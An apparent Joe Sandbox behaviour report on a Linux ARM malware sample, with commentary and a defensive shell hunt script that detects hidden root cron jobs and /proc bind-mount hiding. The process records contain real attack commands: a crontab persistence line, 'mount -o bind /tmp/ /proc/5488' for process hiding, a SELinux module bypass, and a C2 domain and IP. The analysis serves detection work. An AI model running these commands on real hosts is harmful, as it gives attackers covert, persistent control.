Dec 10, 2024 19:03:35.515270948 CET  1.1.1.1        192.168.2.14   0x9d1e    No error (0)  cc.ava9527.cc   -      93.123.85.138   A (IP address)  IN (0x0001)  false

System Behavior

Start time (UTC)  Start date (UTC)  File size      MD5 hash                          Path                   Arguments
18:03:10          10/12/2024        4956856 bytes  5ebfcae4fe2471fcc5695c2394773ff1  /tmp/linux_arm6.elf    /tmp/linux_arm6.elf
18:03:10          10/12/2024        4956856 bytes  5ebfcae4fe2471fcc5695c2394773ff1  /tmp/linux_arm6.elf    -
18:03:10          10/12/2024        4956856 bytes  5ebfcae4fe2471fcc5695c2394773ff1  /tmp/linux_arm6.elf    /tmp/linux_arm6.elf
18:03:14          10/12/2024        4956856 bytes  5ebfcae4fe2471fcc5695c2394773ff1  /tmp/linux_arm6.elf    -
18:03:14          10/12/2024        1183448 bytes  7063c3930affe123baecd3b340f1ad2c  /bin/bash              /bin/bash -c /etc/32675&
18:03:14          10/12/2024        1183448 bytes  7063c3930affe123baecd3b340f1ad2c  /bin/bash              -
18:03:14          10/12/2024        1183448 bytes  7063c3930affe123baecd3b340f1ad2c  /etc/32675             /etc/32675
18:03:14          10/12/2024        1183448 bytes  7063c3930affe123baecd3b340f1ad2c  /etc/32675             -
18:03:14          10/12/2024        39256 bytes    fcba58db24e5e3672c4d70a3bb01d7a4  /usr/bin/sleep         sleep 60
18:04:14          10/12/2024        1183448 bytes  7063c3930affe123baecd3b340f1ad2c  /etc/32675             -
18:04:14          10/12/2024        4956856 bytes  5ebfcae4fe2471fcc5695c2394773ff1  /etc/opt.services.cfg  /etc/opt.services.cfg
18:04:14          10/12/2024        4956856 bytes  5ebfcae4fe2471fcc5695c2394773ff1  /etc/opt.services.cfg  -
18:04:14          10/12/2024        4956856 bytes  5ebfcae4fe2471fcc5695c2394773ff1  /etc/opt.services.cfg  /etc/opt.services.cfg
18:04:15          10/12/2024        1183448 bytes  7063c3930affe123baecd3b340f1ad2c  /etc/32675             -
18:04:15          10/12/2024        39256 bytes    fcba58db24e5e3672c4d70a3bb01d7a4  /usr/bin/sleep         sleep 60
18:03:14          10/12/2024        4956856 bytes  5ebfcae4fe2471fcc5695c2394773ff1  /tmp/linux_arm6.elf    -
18:03:14          10/12/2024        129816 bytes   1e6b1c887c59a315edb7eb9a315fc84c  /usr/sbin/service      service crond start
18:03:14          10/12/2024        129816 bytes   1e6b1c887c59a315edb7eb9a315fc84c  /usr/sbin/service      -
18:03:14          10/12/2024        39256 bytes    3283660e59f128df18bec9b96fbd4d41  /usr/bin/basename      basename /usr/sbin/service
18:03:14          10/12/2024        129816 bytes   1e6b1c887c59a315edb7eb9a315fc84c  /usr/sbin/service      -
18:03:14          10/12/2024        39256 bytes    3283660e59f128df18bec9b96fbd4d41  /usr/bin/basename      basename /usr/sbin/service
18:03:14          10/12/2024        129816 bytes   1e6b1c887c59a315edb7eb9a315fc84c  /usr/sbin/service      -
18:03:14          10/12/2024        996584 bytes   4deddfb6741481f68aeac522cc26ff4b  /usr/bin/systemctl     systemctl --quiet is-active multi-user.target
18:03:14          10/12/2024        129816 bytes   1e6b1c887c59a315edb7eb9a315fc84c  /usr/sbin/service      -
18:03:14          10/12/2024        129816 bytes   1e6b1c887c59a315edb7eb9a315fc84c  /usr/sbin/service      -
18:03:14          10/12/2024        996584 bytes   4deddfb6741481f68aeac522cc26ff4b  /usr/bin/systemctl     systemctl list-unit-files --full --type=socket
18:03:14          10/12/2024        129816 bytes   1e6b1c887c59a315edb7eb9a315fc84c  /usr/sbin/service      -
18:03:14          10/12/2024        121288 bytes   885062561f66aa1d4af4c54b9e7cc81a  /usr/bin/sed           sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
18:03:16          10/12/2024        996584 bytes   4deddfb6741481f68aeac522cc26ff4b  /usr/bin/systemctl     systemctl start crond.service
18:03:17          10/12/2024        4956856 bytes  5ebfcae4fe2471fcc5695c2394773ff1  /tmp/linux_arm6.elf    -
18:03:17          10/12/2024        1183448 bytes  7063c3930affe123baecd3b340f1ad2c  /bin/bash              /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"
18:03:17          10/12/2024        1183448 bytes  7063c3930affe123baecd3b340f1ad2c  /bin/bash              -
18:03:17          10/12/2024        996584 bytes   4deddfb6741481f68aeac522cc26ff4b  /usr/bin/systemctl     systemctl daemon-reload
18:03:18          10/12/2024        1183448 bytes  7063c3930affe123baecd3b340f1ad2c  /bin/bash              -
18:03:18          10/12/2024        996584 bytes   4deddfb6741481f68aeac522cc26ff4b  /usr/bin/systemctl     systemctl enable quotaoff.service
18:03:18          10/12/2024        1183448 bytes  7063c3930affe123baecd3b340f1ad2c  /bin/bash              -
18:03:18          10/12/2024        996584 bytes   4deddfb6741481f68aeac522cc26ff4b  /usr/bin/systemctl     systemctl start quotaoff.service
18:03:19          10/12/2024        1183448 bytes  7063c3930affe123baecd3b340f1ad2c  /bin/bash              -
18:03:19          10/12/2024        80120 bytes    bf3a987344f3bacafc44efd882abda8b  /usr/bin/journalctl    journalctl -xe --no-pager
18:03:20          10/12/2024        4956856 bytes  5ebfcae4fe2471fcc5695c2394773ff1  /tmp/linux_arm6.elf    -
18:03:20          10/12/2024        1183448 bytes  7063c3930affe123baecd3b340f1ad2c  /bin/bash              /bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"
18:03:20          10/12/2024        1183448 bytes  7063c3930affe123baecd3b340f1ad2c  /bin/bash              -
18:03:20          10/12/2024        1183448 bytes  7063c3930affe123baecd3b340f1ad2c  /bin/bash              -
18:03:20          10/12/2024        1183448 bytes  7063c3930affe123baecd3b340f1ad2c  /bin/bash              -
18:03:22          10/12/2024        4956856 bytes  5ebfcae4fe2471fcc5695c2394773ff1  /tmp/linux_arm6.elf    -
18:03:22          10/12/2024        1183448 bytes  7063c3930affe123baecd3b340f1ad2c  /bin/bash              /bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"
18:03:32          10/12/2024        4956856 bytes  5ebfcae4fe2471fcc5695c2394773ff1  /tmp/linux_arm6.elf    -
18:03:32          10/12/2024        14568 bytes    3686c936ed1df483498266a36871cb5b  /usr/bin/renice        renice -20 5488
18:03:32          10/12/2024        4956856 bytes  5ebfcae4fe2471fcc5695c2394773ff1  /tmp/linux_arm6.elf    -
18:03:32          10/12/2024        55528 bytes    92b20aa8b155ecd3ba9414aa477ef565  /usr/bin/mount         mount -o bind /tmp/ /proc/5488
18:03:32          10/12/2024        4956856 bytes  5ebfcae4fe2471fcc5695c2394773ff1  /tmp/linux_arm6.elf    -
18:03:32          10/12/2024        129816 bytes   1e6b1c887c59a315edb7eb9a315fc84c  /usr/sbin/service      service cron start

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/basename
                                                                          Arguments:basename /usr/sbin/service
                                                                          File size:39256 bytes
                                                                          MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/basename
                                                                          Arguments:basename /usr/sbin/service
                                                                          File size:39256 bytes
                                                                          MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/systemctl
                                                                          Arguments:systemctl --quiet is-active multi-user.target
                                                                          File size:996584 bytes
                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/systemctl
                                                                          Arguments:systemctl list-unit-files --full --type=socket
                                                                          File size:996584 bytes
                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/sed
                                                                          Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                          File size:121288 bytes
                                                                          MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                          Start time (UTC):18:03:33
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/systemctl
                                                                          Arguments:systemctl start cron.service
                                                                          File size:996584 bytes
                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                          Start time (UTC):18:03:33
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/tmp/linux_arm6.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):18:03:33
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/systemctl
                                                                          Arguments:systemctl start crond.service
                                                                          File size:996584 bytes
                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

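The records above capture the persistence and hiding steps in order: `/bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"` appends an every-minute root job, `renice -20 5488` gives the sample the highest scheduling priority, `mount -o bind /tmp/ /proc/5488` hides PID 5488 from anything that reads procfs, and `service cron start` (which on this host resolves to `systemctl start cron.service` / `crond.service`) makes sure the scheduler is running. Later records show cron firing `/bin/sh -c "/.mod "` at 18:04:01 and again at 18:05:02, each launching `/usr/lib/libgdi.so.0.8.1`, which has the same size and MD5 as the submitted sample; `/.mod` itself is listed with the size and MD5 of `/bin/bash`, consistent with it being a bash script run through its interpreter (compare `/usr/sbin/service` and `/bin/sh`). The following hunt script is an added example, not part of the Joe Sandbox report or of the sample: it checks a system crontab for root jobs pointing at hidden files or temp directories, and a `/proc/self/mountinfo` listing for mounts placed directly over `/proc/<pid>`. The function names, output format and sample inputs are this example's own; the sample lines that get flagged mirror the report's commands, the benign lines and the device/filesystem details are constructed.

```shell
#!/bin/sh
# Added hunt script (example code, not part of the Joe Sandbox report) for two
# behaviours recorded in the process list above:
#   1. the appended system-crontab entry  "*/1 * * * * root /.mod"
#   2. the bind mount placed over a PID directory: "mount -o bind /tmp/ /proc/5488"
# Function names, output format and all sample input are this example's own.

# Flag system-crontab lines (minute hour dom month dow USER COMMAND) that run as
# root and whose command is a hidden file or lives in a world-writable temp dir.
# Lines using the @reboot/@hourly shorthand are not handled here.
scan_crontab() {
    awk '
        NF == 0 { next }                                      # blank line
        $1 ~ /^#/ { next }                                    # comment
        $1 ~ /^[A-Za-z_][A-Za-z0-9_]*=/ { next }              # SHELL=, PATH=, ...
        NF >= 7 && $6 == "root" {
            cmd = $7
            hidden = (cmd ~ /\/\.[^\/]+$/)                    # e.g. /.mod
            tmpdir = (cmd ~ /^\/(tmp|var\/tmp|dev\/shm)\//)   # dropped in a temp dir
            if (hidden || tmpdir) print
        }
    '
}

# Report mount points sitting directly on /proc/<pid>. Overmounting a PID
# directory replaces the procfs entries of that process, so ps/top and anything
# else that reads /proc no longer see it. Input is /proc/self/mountinfo:
# field 4 is the root of the mounted subtree, field 5 the mount point, and the
# fs type and source follow the "-" separator (its position varies).
find_proc_overmounts() {
    awk '
        $5 ~ /^\/proc\/[0-9]+$/ {
            for (i = 7; i <= NF && $i != "-"; i++) { }
            printf "%s hidden by bind mount of %s (%s %s)\n", $5, $4, $(i+1), $(i+2)
        }
    '
}

# Run both checks on the live host (defined for use; not invoked automatically).
hunt_live() {
    echo "== suspicious root cron jobs =="
    scan_crontab < /etc/crontab
    for f in /etc/cron.d/*; do
        [ -f "$f" ] || continue
        scan_crontab < "$f"
    done
    echo "== /proc/<pid> overmounts =="
    find_proc_overmounts < /proc/self/mountinfo
}

# Constructed sample inputs: the flagged lines mirror the report's commands;
# the benign lines and the device/filesystem details are made up for the demo.
SAMPLE_CRONTAB='# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/1 * * * * root /.mod'

SAMPLE_MOUNTINFO='24 30 0:22 / /proc rw,nosuid,nodev,noexec,relatime shared:15 - proc proc rw
31 24 0:27 / /proc/sys/fs/binfmt_misc rw,relatime shared:20 - autofs systemd-1 rw
41 30 8:1 / /tmp rw,relatime shared:1 - ext4 /dev/sda1 rw
95 24 8:1 /tmp /proc/5488 rw,relatime shared:1 - ext4 /dev/sda1 rw'

# Demo on the constructed data: prints the /.mod job and the /proc/5488 overmount.
printf '%s\n' "$SAMPLE_CRONTAB" | scan_crontab
printf '%s\n' "$SAMPLE_MOUNTINFO" | find_proc_overmounts
```

`hunt_live` is the version to run on a suspect host; it reads `/etc/crontab`, `/etc/cron.d/*` and `/proc/self/mountinfo`. The mountinfo check only sees mounts in the caller's mount namespace, so run it from the host namespace (or via `nsenter`) rather than from inside a container, and treat any hit as a reason to pull the process list from a kernel-level source (a live-response kernel module, a memory image, or `/proc` viewed after `umount /proc/<pid>`) instead of trusting `ps`.
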
                                                                          Start time (UTC):18:03:17
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/systemd
                                                                          Arguments:-
                                                                          File size:1620224 bytes
                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                          Start time (UTC):18:03:17
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          File size:22760 bytes
                                                                          MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                          Start time (UTC):18:03:18
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/systemd
                                                                          Arguments:-
                                                                          File size:1620224 bytes
                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                          Start time (UTC):18:03:18
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          File size:22760 bytes
                                                                          MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                          Start time (UTC):18:03:18
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/systemd
                                                                          Arguments:-
                                                                          File size:1620224 bytes
                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                          Start time (UTC):18:03:18
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/boot/System.mod
                                                                          Arguments:/boot/System.mod
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):18:03:18
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/boot/System.mod
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):18:03:18
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/boot/System.mod
                                                                          Arguments:/boot/System.mod
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):18:03:19
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/systemd
                                                                          Arguments:-
                                                                          File size:1620224 bytes
                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                          Start time (UTC):18:03:19
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/boot/System.mod
                                                                          Arguments:/boot/System.mod
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):18:03:19
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/boot/System.mod
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):18:03:19
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/boot/System.mod
                                                                          Arguments:/boot/System.mod
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/udisks2/udisksd
                                                                          Arguments:-
                                                                          File size:483056 bytes
                                                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/dumpe2fs
                                                                          Arguments:dumpe2fs -h /dev/dm-0
                                                                          File size:31112 bytes
                                                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                          Start time (UTC):18:03:33
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/systemd
                                                                          Arguments:-
                                                                          File size:1620224 bytes
                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                          Start time (UTC):18:03:33
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/cron
                                                                          Arguments:/usr/sbin/cron -f
                                                                          File size:55944 bytes
                                                                          MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/cron
                                                                          Arguments:-
                                                                          File size:55944 bytes
                                                                          MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/cron
                                                                          Arguments:-
                                                                          File size:55944 bytes
                                                                          MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:/bin/sh -c "/.mod "
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/.mod
                                                                          Arguments:/.mod
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/.mod
                                                                          Arguments:-
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/libgdi.so.0.8.1
                                                                          Arguments:/usr/lib/libgdi.so.0.8.1
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/libgdi.so.0.8.1
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/libgdi.so.0.8.1
                                                                          Arguments:/usr/lib/libgdi.so.0.8.1
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/systemd
                                                                          Arguments:-
                                                                          File size:1620224 bytes
                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/cron
                                                                          Arguments:/usr/sbin/cron -f
                                                                          File size:55944 bytes
                                                                          MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                          Start time (UTC):18:05:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/cron
                                                                          Arguments:-
                                                                          File size:55944 bytes
                                                                          MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/cron
                                                                          Arguments:-
                                                                          File size:55944 bytes
                                                                          MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:/bin/sh -c "/.mod "
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/.mod
                                                                          Arguments:/.mod
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/.mod
                                                                          Arguments:-
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/libgdi.so.0.8.1
                                                                          Arguments:/usr/lib/libgdi.so.0.8.1
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/libgdi.so.0.8.1
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/libgdi.so.0.8.1
                                                                          Arguments:/usr/lib/libgdi.so.0.8.1
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/systemd
                                                                          Arguments:-
                                                                          File size:1620224 bytes
                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/cron
                                                                          Arguments:/usr/sbin/cron -f
                                                                          File size:55944 bytes
                                                                          MD5 hash:2c82564ff5cc862c89392b061c7fbd59